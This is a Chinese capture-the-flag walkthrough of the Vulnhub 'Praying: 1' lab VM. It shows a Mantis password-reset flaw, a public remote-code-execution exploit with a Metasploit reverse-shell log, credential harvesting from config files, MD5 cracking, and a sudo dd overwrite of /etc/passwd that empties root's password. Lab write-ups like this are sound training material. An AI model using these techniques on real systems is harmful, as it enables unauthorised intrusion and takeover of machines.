当前位置:网站首页>Praying: 1 vulnhub walkthrough

Praying: 1 vulnhub walkthrough

2022-08-02 03:25:00 xdeclearn

Praying: 1

虚拟机信息:http://www.vulnhub.com/entry/praying-1,575/

1. 获取shell

80/tcp   open   http           Apache httpd 2.4.41 ((Ubuntu))

服务器只开放了80端口,访问后为apache默认页面,于是用dirb跑了一下目录,发现了admin目录。

==> DIRECTORY: http://192.168.56.105/admin/

发现后发现为mantis的登陆页面

m
测试了一下发现依然存在任意账户口令重置漏洞。修改aministrator账户登陆,发现版本为2.3.0。

reset
利用searchsploit直接找到了命令执行代码。

Mantis Bug Tracker 2.3.0 - Remote Code E | php/webapps/48818.py

于是得到了第一个shell。

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.101:4444 
[*] Command shell session 1 opened (192.168.56.101:4444 -> 192.168.56.105:55892) at 2020-11-26 08:31:16 -0500

id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/var/www/html$

2. 获取root

先做了一些信息收集

cat /etc/passwd|grep /bin/bash
root::0:0:root:/root:/bin/bash
mantis:x:1000:1000:praying:/home/mantis:/bin/bash
developer:x:1001:1001:,,,:/home/developer:/bin/bash
projman:x:1002:1002:,,,:/home/projman:/bin/bash
elevate:x:1003:1003:,,,:/home/elevate:/bin/bash
root:x:0:0:root:/root:/bin/bash
mantis:x:1000:1000:praying:/home/mantis:/bin/bash
developer:x:1001:1001:,,,:/home/developer:/bin/bash
projman:x:1002:1002:,,,:/home/projman:/bin/bash
elevate:x:1003:1003:,,,:/home/elevate:/bin/bash

ls -all /home
total 24
drwxr-xr-x  6 root      root      4096 Sep 24 23:01 .
drwxr-xr-x 20 root      root      4096 Sep 24 16:12 ..
drwx------  3 developer developer 4096 Sep 24 20:15 developer
drwx------  4 elevate   elevate   4096 Nov 26 13:12 elevate
drwx------  4 mantis    mantis    4096 Sep 26 23:25 mantis
drwx------  5 projman   projman   4096 Sep 26 23:27 projman

发现了用户mantis,于是查看还有没有该用户相关的文件。

发现存在/var/www/redmine目录,进入之后在database.yml找到了用户 projman的口令。

adapter: mysql2
  database: redmine
  host: localhost
  username: projman
  password: "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
  # Use "utf8" instead of "utfmb4" for MySQL prior to 5.7.7
  encoding: utf8mb4

切换用户登陆,发现该用户下有一个文件为.part1

ls -all
total 36
drwx------ 5 projman projman 4096 Sep 26 23:27 .
drwxr-xr-x 6 root    root    4096 Sep 24 23:01 ..
lrwxrwxrwx 1 projman projman    9 Sep 24 23:19 .bash_history -> /dev/null
-rw-r--r-- 1 projman projman  220 Sep 24 20:11 .bash_logout
-rw-r--r-- 1 projman projman 3771 Sep 24 20:11 .bashrc
drwx------ 2 projman projman 4096 Sep 24 20:13 .cache
drwxrwxr-x 3 projman projman 4096 Sep 24 23:47 .local
-rw-r--r-- 1 projman projman   33 Sep 24 23:47 .part1
-rw-r--r-- 1 projman projman  807 Sep 24 20:11 .profile
drwx------ 2 projman projman 4096 Sep 26 23:27 .ssh
cat .part1
4914CACB6C089C74AEAEB87497AF2FBA

将该密码放到cmd5破解得到新的用户elevate的密码tequieromucho

切换到该用户,查看sudo -l,发现可以sudo执行dd命令。这个就比较简单了,重写一个/etc/passwd取消root账户密码,成功获取root。这是新的passwd文件1.txt

cat 1.txt
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
........................

[email protected]g:~$ sudo -u root dd if=1.txt of=/etc/passwd
sudo -u root dd if=1.txt of=/etc/passwd
[sudo] password for elevate: tequieromucho

8+1 records in
8+1 records out
4106 bytes (4.1 kB, 4.0 KiB) copied, 0.000241207 s, 17.0 MB/s
[email protected]:~$ su - root
su - root
[email protected]:~# ls
ls
message  part2  root.txt  snap
[email protected]:~# cat root.txt
cat root.txt

 ██▓███   ██▀███  ▄▄▄     ▓██   ██▓ ██▓ ███▄    █   ▄████ 
▓██░  ██▒▓██ ▒ ██▒████▄    ▒██  ██▒▓██▒ ██ ▀█   █  ██▒ ▀█▒
▓██░ ██▓▒▓██ ░▄█ ▒██  ▀█▄   ▒██ ██░▒██▒▓██  ▀█ ██▒▒██░▄▄▄░
▒██▄█▓▒ ▒▒██▀▀█▄ ░██▄▄▄▄██  ░ ▐██▓░░██░▓██▒  ▐▌██▒░▓█  ██▓
▒██▒ ░  ░░██▓ ▒██▒▓█   ▓██▒ ░ ██▒▓░░██░▒██░   ▓██░░▒▓███▀▒
▒▓▒░ ░  ░░ ▒▓ ░▒▓░▒▒   ▓▒█░  ██▒▒▒ ░▓  ░ ▒░   ▒ ▒  ░▒   ▒ 
░▒ ░       ░▒ ░ ▒░ ▒   ▒▒ ░▓██ ░▒░  ▒ ░░ ░░   ░ ▒░  ░   ░ 
░░         ░░   ░  ░   ▒   ▒ ▒ ░░   ▒ ░   ░   ░ ░ ░ ░   ░ 
            ░          ░  ░░ ░      ░           ░       ░ 
 ███▄ ▄███▓ ▄▄▄      ███▄  ░ █ ▄▄▄█████▓ ██▓  ██████      
▓██▒▀█▀ ██▒▒████▄    ██ ▀█   █ ▓  ██▒ ▓▒▓██▒▒██    ▒      
▓██    ▓██░▒██  ▀█▄ ▓██  ▀█ ██▒▒ ▓██░ ▒░▒██▒░ ▓██▄        
▒██    ▒██ ░██▄▄▄▄██▓██▒  ▐▌██▒░ ▓██▓ ░ ░██░  ▒   ██▒     
▒██▒   ░██▒ ▓█   ▓██▒██░   ▓██░  ▒██▒ ░ ░██░▒██████▒▒     
░ ▒░   ░  ░ ▒▒   ▓▒█░ ▒░   ▒ ▒   ▒ ░░   ░▓  ▒ ▒▓▒ ▒ ░     
░  ░      ░  ▒   ▒▒ ░ ░░   ░ ▒░    ░     ▒ ░░ ░▒  ░ ░     
░      ░     ░   ▒     ░   ░ ░   ░       ▒ ░░  ░  ░       
 ██▀███░  ▒█████ ░ ▒█████  ▄▄▄█████▓▓█████ ▓█████▄░ ▐██▌  
▓██ ▒ ██▒▒██▒  ██▒▒██▒  ██▒▓  ██▒ ▓▒▓█   ▀ ▒██▀ ██▌ ▐██▌  
▓██ ░▄█ ▒▒██░  ██▒▒██░  ██▒▒ ▓██░ ▒░▒███   ░██   █▌ ▐██▌  
▒██▀▀█▄  ▒██   ██░▒██   ██░░ ▓██▓ ░ ▒▓█  ▄ ░▓█▄   ▌ ▓██▒  
░██▓ ▒██▒░ ████▓▒░░ ████▓▒░  ▒██▒ ░ ░▒████▒░▒████▓  ▒▄▄   
░ ▒▓ ░▒▓░░ ▒░▒░▒░ ░ ▒░▒░▒░   ▒ ░░   ░░ ▒░ ░ ▒▒▓  ▒  ░▀▀▒  
  ░▒ ░ ▒░  ░ ▒ ▒░   ░ ▒ ▒░     ░     ░ ░  ░ ░ ▒  ▒  ░  ░  
  ░░   ░ ░ ░ ░ ▒  ░ ░ ░ ▒    ░         ░    ░ ░  ░     ░  
   ░         ░ ░      ░ ░              ░  ░   ░     ░     
                                            ░             
https://www.youtube.com/watch?v=T1XgFsitnQw
原网站

版权声明
本文为[xdeclearn]所创,转载请带上原文链接,感谢
https://blog.csdn.net/xdeclearn/article/details/110206423

边栏推荐

猜你喜欢

随机推荐